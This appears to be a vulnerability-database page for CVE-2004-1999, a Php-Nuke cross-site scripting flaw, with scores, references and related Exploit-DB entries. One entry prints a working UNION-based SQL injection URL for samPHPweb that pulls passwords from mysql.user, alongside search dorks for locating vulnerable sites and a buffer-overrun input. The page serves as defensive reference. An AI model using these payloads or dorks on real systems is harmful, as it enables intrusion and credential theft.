CVE-2004-1999
Published 2004-05-05
Priority P4 · 15 · medium · 4.3 · CVSS 2.0
AV:N/AC:M/Au:N/C:N/I:P/A:N
EPSS: 1.26% (65.8th percentile)
Cross-site scripting (XSS) vulnerability in the Downloads module in Php-Nuke 6.x through 7.2 allows remote attackers to inject arbitrary HTML and web script via the (1) ttitle or (2) sid parameters to modules.php.
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
CVSS provenance
nvd · v2.0 · 4.3 · MEDIUM · AV:N/AC:M/Au:N/C:N/I:P/A:N
vendor_redhat · 2.1 · LOW
GHSA
GHSA-9crw-h8v9-v2xf: Cross-site scripting (XSS) vulnerability in the Downloads module in Php-Nuke 6
ghsa_unreviewed·2022-04-29
CVE-2004-1999 [MEDIUM] GHSA-9crw-h8v9-v2xf: Cross-site scripting (XSS) vulnerability in the Downloads module in Php-Nuke 6
Red Hat
CVE-2004-0603: gzexe in gzip 1
vendor_redhat·CVSS 2.1
CVE-2004-0603 [LOW] CVE-2004-0603: gzexe in gzip 1
gzexe in gzip 1.3.3 and earlier will execute an argument when the creation of a temp file fails instead of exiting the program, which could allow remote attackers or local users to execute arbitrary commands, a different vulnerability than CVE-1999-1332.
Statement: Red Hat Enterprise Linux 5 is not vulnerable to this issue as it contains a backported patch.
No detection rules found.
Exploit-DB
samPHPweb 4.2.2 - 'songinfo.php' SQL Injection
exploitdb·2008-01-05
CVE-2008-0187 samPHPweb 4.2.2 - 'songinfo.php' SQL Injection
---
Title:samPHPweb (songinfo.php) Remote SQL Injection
Script:samPHPweb
Download:http://www.spacialaudio.com/download/samPHPweb.zip
Bug:songinfo.php
Author:BackDoor
Dork1:inurl:samPHPweb/playing.php
Dork2:This page was produced using SAM Broadcaster. © Copyright Spacial Audio Solutions, LLC 1999 - 2004.
Exploit:
www.victim.com/scriptpath/songinfo.php?songid=-1/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,password,user,16,17,18,19,20,21,22,23,24,@@version,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44/**/from/**/mysql.user
# milw0rm.com [2008-01-05]
Exploit-DB
samPHPweb 4.2.2 - 'db.php' Remote File Inclusion
exploitdb·2008-01-04
CVE-2008-0143 samPHPweb 4.2.2 - 'db.php' Remote File Inclusion
---
+______________________________________________By Crackers_Child___________________________________________+
*
*
* [~] Script.......: samPHPweb
* [~] Page.........: http://support.spacialaudio.com/forums/viewforum.php?f=22 & http://www.spacialaudio.com/
* [~] Author.......: Crackers_Child | [email protected] & [email protected]
* [~] Class........: Remote File Include Vulnerability
* [~] Dork.........: This page was produced using SAM Broadcaster. © Copyright Spacial Audio Solutions, LLC 1999 - 2004.
* [~] Dork.........: This page was produced using SAM Broadcaster. © Copyright Spacial Audio Solutions
* [~] Dork.........: This page was produced using SAM2 (Streaming Audio Manager)
+____________________________________
Exploit-DB
Internet Security Systems BlackICE PC Protection 3.6 - Firewall.INI Local Buffer Overrun
exploitdb·2004-08-11
CVE-2004-1714 Internet Security Systems BlackICE PC Protection 3.6 - Firewall.INI Local Buffer Overrun
---
source: https://www.securityfocus.com/bid/10915/info
It is reported that BlackICE PC Protection is prone to a local buffer overrun when handling excessive input in certain configuration directives parsed from the firewall.ini file included with the software.
It is reported that when the system is restarted and the affected software reads the malicious firewall.ini file, both the blackice.exe and blackd.exe executables will crash.
REJECT, 138, default, 1999-07-22 20:26:53, AAAAAAAAAAAAAAAAA.... , 2000,
unknown
(Approx. 1000 A's)
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=108378804809891&w=2
http://secunia.com/advisories/11553
http://www.waraxe.us/index.php?modname=sa&id=27
https://exchange.xforce.ibmcloud.com/vulnerabilities/16073